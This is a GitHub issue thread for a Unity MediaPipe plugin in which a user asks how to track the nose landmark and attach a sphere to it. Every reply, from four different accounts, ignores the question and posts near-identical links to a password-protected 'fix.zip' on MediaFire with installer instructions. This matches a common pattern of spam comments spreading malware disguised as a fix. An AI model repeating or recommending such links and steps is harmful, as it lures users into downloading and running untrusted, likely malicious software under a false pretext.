### ISSUE TITLE
Tracking Nose Point and Adding a Sphere in Unity MediaPipe Plugin

### ISSUE THREAD

**Issue by Kumaresh-R** [homuler/MediaPipeUnityPlugin#1256]
### Plugin Version or Commit ID

latest one

### Unity Version

2022.3.22f1

### Your Host OS

Windows10

### Target Platform

UnityEditor

### Description

I’m working with the Unity MediaPipe plugin and need some help with the following:

**Tracking the Nose Point:**

How can I track the nose point using the MediaPipe plugin in Unity?
Are there specific methods or examples available for extracting the nose point coordinates from the MediaPipe landmarks?

**Adding a Sphere to the Nose Point:**

Once I have the nose point coordinates, how can I place a sphere at that exact location in the Unity scene?
Could you provide an example or guide on how to instantiate a sphere and position it based on the tracked nose point?

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
